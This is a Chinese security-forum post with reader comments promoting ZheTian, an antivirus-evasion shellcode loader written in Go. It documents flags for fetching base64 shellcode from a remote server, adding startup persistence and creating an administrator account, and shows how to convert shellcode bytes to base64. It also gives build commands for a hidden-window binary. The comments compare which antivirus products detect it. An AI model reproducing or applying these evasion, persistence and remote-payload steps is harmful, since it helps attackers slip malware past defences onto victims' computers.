3月18日更新:沙箱全绿免杀 BY ZheTian

2021-09-07 10:38:53 44 16219

距离上次更新过了很久了。近日golang更新了1.18,优化了项目编译方式,意味着基于go的免杀项目又可以残喘一段时间了。

之前在社区看到大佬说加些无用函数过免杀,让我想到了Java的try case 。故意将项目报错使之进入case选项,在case里执行注入shellcode操作。说干就干,新项目在沙箱里全绿了,以及网友的测试。项目代码已经更新,请各位大佬自测。

注意使用go1.18版本

------------3.18日更新----------------

ZheTian

ZheTian Powerful remote load and execute ShellCode tool,免杀shellcode加载框架

命令详解

-u:从远程服务器加载base64混淆后的字节码。

-r:从本地文件内读。

-s:读取无修改的原始文件,只能从本地加载

-o:参数为true自动向启动项添加自启模块。

-n:向管理员组创建用户,-n的参数即为账户,-p的参数为密码。需以管理员身份运行

-c:直接从命令行获取base64字符串。如:ZheTian -c ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M==...

·如果releases里下载的可执行程序被安全软件查杀了,请下载源码重新编译一份!·

示例:

Base64字符串方式加载:

原始python代码:

buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75..."

只需提取数组中的16进制代码:

\xfc\x48\x83\xe4\xf0\xe8\xc8\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75...

然后去除\x,得到: fc4883e4f0e8c88b52208b423c4801d0668178180b0275......

然后使用base64转码,得到: ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M0ODAxZDA2NjgxNzgxODBiMDI3NQ==

c、ruby等同理,Java之流的则是去除 ", 0x"。注意,是逗号空格0x byte buf[] = new byte[] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41};

获取到base64字符串之后可以选择放到远程服务器加载,使用-u 命令即可。也可以放到本地文件内,或者直接使用-c命令以命令行方式运行。如:ZheTian.exe -c ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M0ODAxZDA2NjgxNzgxODBiMDI3NQ==

原文件读取类型:

使用 ZheTian -h命令可查看支持的语言。推荐使用Java、py、C语言。原文件无需进行任何修改即可直接加载,但是不支持放在远程服务器,只能通过本地 -s 命令读取,如: ZheTian -s C:/Windows/Temp/payload.java

编译:

go build -ldflags "-w -s" -o ZheTian.exe

可以使用

go build -ldflags "-w -s -H windowsgui" -o ZheTian.exe

实现无窗口运行。但是360偶尔会识别为恶意程序。如果目标机器无安全设备,可以尝试使用此命令打包,然后使用参数: -o true 实现写入启动项功能。

带图标编译:

先执行:go get github.com/akavel/rsrc

rsrc -manifest ZheTian.manifest -ico favicon.ico -o ZheTian.syso

再执行go build -ldflags "-w -s" -o ZheTian.exe

更多介绍:https://blog.csdn.net/qq_38376348/article/details/108318880

注意:打包的时候需指定是64位还是32位。默认会根据系统自动选择。 而在生成payload shellcode的时候也需要选择正确的位数,否则会加载失败。使用code字节码加载时一定要使用base64加密,否则无法解析!!

有问题可以提Issues,也可加联系方式。

项目地址:https://github.com/yqcs/ZheTian/

TCV:1

关于作者

heartsk10篇文章111篇回复

业余红蓝对抗

评论44次

要评论?请先  登录  或  注册
  • TOP1
    2021-9-7 11:13

    麻烦搬帖子以后带上链接好吗?https://github.com/yqcs/ZheTian

  • 44楼
    2022-3-21 09:30
    我已成年

    火绒生成的时候直接报毒了

    1
    heartsk

    怎么会,我刚装的完整版火绒。-s -w只是去除程序的debug和符号表。本身并不是恶意操作。所以单纯的一个程序直接使用这个命令为什么会被杀?除非程序内的恶意操作被检测到了

    2
    shee01

    现在应该已经没了吧

    3

    还ok。十天半月的还可以用

  • 43楼
    2022-3-18 23:44
    我已成年

    火绒生成的时候直接报毒了

    1
    heartsk

    怎么会,我刚装的完整版火绒。-s -w只是去除程序的debug和符号表。本身并不是恶意操作。所以单纯的一个程序直接使用这个命令为什么会被杀?除非程序内的恶意操作被检测到了

    2

    现在应该已经没了吧

  • 42楼
    2022-3-18 23:19

    新方式已出,各位大佬前来看看

  • 41楼
    2021-9-15 17:03
    Sombra

    显示执行成功,但是没有弹计算机,报错了

    1

    解决了,可以弹计算器,但是还是会有报错信息出来

  • 40楼
    2021-9-15 16:41

    显示执行成功,但是没有弹计算机,报错了

  • 39楼
    2021-9-15 14:43
    Alkaid

    360还没测,这种方法过个defender很轻松

    1

    WD过不了的好吧

  • 38楼
    2021-9-15 11:24

    卡巴斯基的行为检测,自己重新编译的。静态检测倒是可以,动态一运行就被杀了

    应用程序: ZheTian.exe用户: Administrator (活动用户)组件: 行为检测结果: 已终止:PDM:Exploit.Win32.Generic.nblk对象: D:\ZheTian-1.0.4\ZheTian.exe哈xi: xxxxxxxxxxxxxxxxxxxx

  • 37楼
    2021-9-13 15:24

    win10DF应该过不去的。运行一次,一会就杀了

  • 36楼
    2021-9-13 11:54
    C00lWinD9

    直接编译不带参数,360就不会杀

    1

    不知道为什么讨论一些不重要的参数问题,我写的goland很多都是go build -ldflags="-w -s -H=windowsgui"编译的并不会被无脑杀,还得看会不会被检测出来恶意的东西

  • 35楼
    2021-9-13 10:37
    crow4

    遮天??掩日??是同一人吗?

    1
    heartsk

    不是。我用的第一款免杀根据是掩日。但是我起遮天这个名字更多是因为大部分安全设备都带个天字,如天擎天镜什么的,所以就起了这个名字

    2

    QMXC受害者是吧?崽种

  • 34楼
    2021-9-12 12:01
    crow4

    遮天??掩日??是同一人吗?

    1

    不是。我用的第一款免杀根据是掩日。但是我起遮天这个名字更多是因为大部分安全设备都带个天字,如天擎天镜什么的,所以就起了这个名字

  • 33楼
    2021-9-12 08:26

    有能过内存查杀的办法没?

  • 32楼
    2021-9-12 00:00

    遮天??掩日??是同一人吗?

  • 31楼
    2021-9-10 17:21
    coollce

    最近用了很多框架,都不好用,试试这个

    1

    有问题可以联xi哦

  • 30楼
    2021-9-10 17:04

    最近用了很多框架,都不好用,试试这个

  • 29楼
    2021-9-9 10:05

    下载个试试先

  • 28楼
    2021-9-9 00:04
    学渣aufeng

    感谢分享免杀的方法,楼主愿意分享已经很好了。这里提一下,360会检测虚拟机和物理机的。之前亲测过虚拟机不杀,物理机会杀。也可能是360云查杀的功能点。

    1

    是的,360云查杀这个难搞,本机有时候又不好测,有时候虚拟机都会蹦,容易出现问题,麻烦

  • 27楼
    2021-9-8 14:13

    感谢分享免杀的方法,楼主愿意分享已经很好了。这里提一下,360会检测虚拟机和物理机的。之前亲测过虚拟机不杀,物理机会杀。也可能是360云查杀的功能点。

  • 26楼
    2021-9-8 12:35

    忘了说了,还可以过360添加用户

  • 25楼
    2021-9-8 12:07
    Alan

    火绒过了

    1
    heartsk

    是呀。我本机实测360火绒都过了。上面一哥们编译的 时候就被火绒拦了

    2

    可能是虚拟机测试的,虚拟机有时候有问题